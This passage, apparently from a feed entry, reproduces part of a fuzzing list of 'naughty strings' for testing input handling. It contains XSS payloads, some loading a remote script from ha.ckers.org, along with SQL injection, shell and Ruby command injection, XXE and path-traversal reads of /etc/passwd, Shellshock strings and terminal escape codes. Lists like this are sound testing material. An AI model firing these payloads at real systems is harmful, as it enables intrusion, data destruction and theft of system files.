href=&amp;quot;\xE2\x80\x81javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Djavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x87javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x07javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE1\x9A\x80javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x83javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x04javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x01javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x08javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x84javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x86javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE3\x80\x80javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x12javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x0Djavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x0Ajavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x0Cjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x15javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\xA8javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x16javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x02javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Bjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x06javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\xA9javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x80\x85javascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Ejavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\xE2\x81\x9Fjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;\x1Cjavascript:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;javascript\x00:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;javascript\x3A:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;javascript\x09:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;javascript\x0D:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;&amp;lt;a href=&amp;quot;javascript\x0A:javascript:alert(1)&amp;quot; id=&amp;quot;fuzzelement1&amp;quot;&amp;gt;test&amp;lt;/a&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x0Aonerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x22onerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x0Bonerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x0Donerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x2Fonerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x09onerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x0Conerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x00onerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x27onerror=javascript:alert(1)&amp;gt;&#10;`&amp;quot;'&amp;gt;&amp;lt;img src=xxx:x \x20onerror=javascript:alert(1)&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x3Bjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x0Djavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xEF\xBB\xBFjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x81javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x84javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE3\x80\x80javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x09javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x89javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x85javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x88javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x00javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\xA8javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x8Ajavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE1\x9A\x80javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x0Cjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x2Bjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xF0\x90\x96\x9Ajavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;-javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x0Ajavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\xAFjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x7Ejavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x87javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x81\x9Fjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\xA9javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xC2\x85javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xEF\xBF\xAEjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x83javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x8Bjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xEF\xBF\xBEjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x80javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x21javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x82javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE2\x80\x86javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xE1\xA0\x8Ejavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x0Bjavascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\x20javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;quot;`'&amp;gt;&amp;lt;script&amp;gt;\xC2\xA0javascript:alert(1)&amp;lt;/script&amp;gt;&#10;&amp;lt;img \x00src=x onerror=&amp;quot;alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x47src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x11src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x12src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x47src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x10src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x13src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x32src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x47src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img\x11src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x47src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x34src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x39src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img \x00src=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x09=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x10=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x13=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x32=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x12=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x11=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x00=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src\x47=x onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x\x09onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x\x10onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x\x11onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x\x12onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x\x13onerror=&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img[a][b][c]src[d]=x[e]onerror=[f]&amp;quot;alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x09&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x10&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x11&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x12&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x32&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;img src=x onerror=\x00&amp;quot;javascript:alert(1)&amp;quot;&amp;gt;&#10;&amp;lt;a href=java&amp;amp;#1&amp;amp;#2&amp;amp;#3&amp;amp;#4&amp;amp;#5&amp;amp;#6&amp;amp;#7&amp;amp;#8&amp;amp;#11&amp;amp;#12script:javascript:alert(1)&amp;gt;XXX&amp;lt;/a&amp;gt;&#10;&amp;lt;img src=&amp;quot;x` `&amp;lt;script&amp;gt;javascript:alert(1)&amp;lt;/script&amp;gt;&amp;quot;` `&amp;gt;&#10;&amp;lt;img src onerror /&amp;quot; '&amp;quot;= alt=javascript:alert(1)//&amp;quot;&amp;gt;&#10;&amp;lt;title onpropertychange=javascript:alert(1)&amp;gt;&amp;lt;/title&amp;gt;&amp;lt;title title=&amp;gt;&#10;&amp;lt;a href=&lt;a href=&quot;http://foo.bar/#x=&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://foo.bar/#x=&lt;/a&gt;`y&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;img alt=&amp;quot;`&amp;gt;&amp;lt;img src=x:x onerror=javascript:alert(1)&amp;gt;&amp;lt;/a&amp;gt;&amp;quot;&amp;gt;&#10;&amp;lt;!--[if]&amp;gt;&amp;lt;script&amp;gt;javascript:alert(1)&amp;lt;/script --&amp;gt;&#10;&amp;lt;!--[if&amp;lt;img src=x onerror=javascript:alert(1)//]&amp;gt; --&amp;gt;&#10;&amp;lt;script src=&amp;quot;/\%(jscript)s&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&#10;&amp;lt;script src=&amp;quot;\\%(jscript)s&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&#10;&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&#10;&amp;lt;IMG SRC=# onmouseover=&amp;quot;alert('xxs')&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC= onmouseover=&amp;quot;alert('xxs')&amp;quot;&amp;gt;&#10;&amp;lt;IMG onmouseover=&amp;quot;alert('xxs')&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&#10;&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&#10;&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&#10;&amp;lt;IMG SRC=&amp;quot;jav   ascript:alert('XSS');&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&#10;&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&#10;perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&#10;&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&#10;&amp;lt;SCRIPT/XSS SRC=&amp;quot;&lt;a href=&quot;http://ha.ckers.org/xss.js&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://ha.ckers.org/xss.js&lt;/a&gt;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&#10;&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&#10;&amp;lt;SCRIPT/SRC=&amp;quot;&lt;a href=&quot;http://ha.ckers.org/xss.js&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://ha.ckers.org/xss.js&lt;/a&gt;&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&#10;&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&#10;&amp;lt;SCRIPT SRC=&lt;a href=&quot;http://ha.ckers.org/xss.js?&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://ha.ckers.org/xss.js?&lt;/a&gt;&amp;lt; B &amp;gt;&#10;&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&#10;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&#10;&amp;lt;iframe src=&lt;a href=&quot;http://ha.ckers.org/scriptlet.html&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://ha.ckers.org/scriptlet.html&lt;/a&gt; &amp;lt;&#10;\&amp;quot;;alert('XSS');//&#10;&amp;lt;u oncopy=alert()&amp;gt; Copy me&amp;lt;/u&amp;gt;&#10;&amp;lt;i onwheel=alert(1)&amp;gt; Scroll over me &amp;lt;/i&amp;gt;&#10;&amp;lt;plaintext&amp;gt;&#10;&lt;a href=&quot;http://a/%%30%30&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://a/%%30%30&lt;/a&gt;&#10;&amp;lt;/textarea&amp;gt;&amp;lt;script&amp;gt;alert(123)&amp;lt;/script&amp;gt;&#10;&#10;#	SQL Injection&#10;#&#10;#	Strings which can cause a SQL injection if inputs are not sanitized&#10;&#10;1;DROP TABLE users&#10;1'; DROP TABLE users-- 1&#10;' OR 1=1 -- 1&#10;' OR '1'='1&#10; &#10;%&#10;_&#10;&#10;#	Server Code Injection&#10;#&#10;#	Strings which can cause user to run code on server as a privileged user (c.f. &lt;a href=&quot;https://news.ycombinator.com/item?id=7665153)&quot; rel=&quot;nofollow ugc noopener&quot;&gt;https://news.ycombinator.com/item?id=7665153)&lt;/a&gt;&#10;&#10;-&#10;--&#10;--version&#10;--help&#10;$USER&#10;/dev/null; touch /tmp/blns.fail ; echo&#10;`touch /tmp/blns.fail`&#10;$(touch /tmp/blns.fail)&#10;@{[system &amp;quot;touch /tmp/blns.fail&amp;quot;]}&#10;&#10;#	Command Injection (Ruby)&#10;#&#10;#	Strings which can call system commands within Ruby/Rails applications&#10;&#10;eval(&amp;quot;puts 'hello world'&amp;quot;)&#10;System(&amp;quot;ls -al /&amp;quot;)&#10;`ls -al /`&#10;Kernel.exec(&amp;quot;ls -al /&amp;quot;)&#10;Kernel.exit(1)&#10;%x('ls -al /')&#10;&#10;#      XXE Injection (XML)&#10;#&#10;#	String which can reveal system files when parsed by a badly configured XML parser&#10;&#10;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [ &amp;lt;!ELEMENT foo ANY &amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot; &amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xxe;&amp;lt;/foo&amp;gt;&#10;&#10;#	Unwanted Interpolation&#10;#&#10;#	Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.&#10;&#10;$HOME&#10;$ENV{'HOME'}&#10;%d&#10;%s%s%s%s%s&#10;{0}&#10;%*.*s&#10;%@&#10;%n&#10;File:///&#10;&#10;#	File Inclusion&#10;#&#10;#	Strings which can cause user to pull in files that should not be a part of a web server&#10;&#10;../../../../../../../../../../../etc/passwd%00&#10;../../../../../../../../../../../etc/hosts&#10;&#10;#	Known CVEs and Vulnerabilities&#10;#&#10;#	Strings that test for known vulnerabilities&#10;&#10;() { 0; }; touch /tmp/blns.shellshock1.fail;&#10;() { _; } &amp;gt;_[$($())] { touch /tmp/blns.shellshock2.fail; }&#10;&amp;lt;&amp;lt;&amp;lt; %s(un='%s') = %u&#10;+++ATH0&#10;&#10;#	MSDOS/Windows Special Filenames&#10;#&#10;#	Strings which are reserved characters in MSDOS/Windows&#10;&#10;CON&#10;PRN&#10;AUX&#10;CLOCK$&#10;NUL&#10;A:&#10;ZZ:&#10;COM1&#10;LPT1&#10;LPT2&#10;LPT3&#10;COM2&#10;COM3&#10;COM4&#10;&#10;#   IRC specific strings&#10;#&#10;#   Strings that may occur on IRC clients that make security products freak out&#10;&#10;DCC SEND STARTKEYLOGGER 0 0 0&#10;&#10;#	Scunthorpe Problem&#10;#&#10;#	Innocuous strings which may be blocked by profanity filters (&lt;a href=&quot;https://en.wikipedia.org/wiki/Scunthorpe_problem)&quot; rel=&quot;nofollow ugc noopener&quot;&gt;https://en.wikipedia.org/wiki/Scunthorpe_problem)&lt;/a&gt;&#10;&#10;Scunthorpe General Hospital&#10;Penistone Community Church&#10;Lightwater Country Park&#10;Jimmy Clitheroe&#10;Horniman Museum&#10;shitake mushrooms&#10;RomansInSussex.co.uk&#10;&lt;a href=&quot;http://www.cum.qc.ca/&quot; rel=&quot;nofollow ugc noopener&quot;&gt;http://www.cum.qc.ca/&lt;/a&gt;&#10;Craig Cockburn, Software Specialist&#10;Linda Callahan&#10;Dr. Herman I. Libshitz&#10;magna cum laude&#10;Super Bowl XXX&#10;medieval erection of parapets&#10;evaluate&#10;mocha&#10;expression&#10;Arsenal canal&#10;classic&#10;Tyson Gay&#10;Dick Van Dyke&#10;basement&#10;&#10;#	Human injection&#10;#&#10;#	Strings which may cause human to reinterpret worldview&#10;&#10;If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.&#10;&#10;#	Terminal escape codes&#10;#&#10;#	Strings which punish the fools who use cat/type on this file&#10;&#10;Roses are ?[0;31mred?[0m, violets are ?[0;34mblue. Hope you enjoy terminal hue&#10;But now...?[20Cfor my greatest trick...?[8m&#10;The quic??????k brown fo???????????x... [Beeeep]&#10;&#10;#	iOS Vulnerabilities&#10;#&#10;#	Strings which crashed iMessage in various versions of iOS&#10;&#10;Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗&#10;🏳0🌈️&#10;జ్ఞ‌ా&lt;/pre&gt;&#10;&lt;/div&gt;&#10;</content>
<published>2018-11-06T09:20:29+02:00</published>
</entry>


</feed>